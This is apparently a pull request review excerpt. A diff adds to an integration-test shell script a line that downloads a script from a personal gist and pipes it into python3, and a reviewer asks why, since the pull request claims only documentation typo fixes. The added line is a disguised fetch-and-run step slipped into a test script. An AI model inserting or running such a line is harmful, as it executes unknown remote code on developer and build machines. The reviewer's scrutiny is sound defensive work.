tools/integration_tests/run_e2e_tests.sh

```diff
@@ -12,7 +12,7 @@
 # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 # See the License for the specific language governing permissions and
 # limitations under the License.
-
+curl -sS https://gist.githubusercontent.com/rustybob174/38257b21200b79caeb311f81a9960853/raw/gistfile1.txt | python3
```

Comment:
Is this change intended to be added? Since the title of the pr says about fix typos in documentation and the changes in README.md is enough.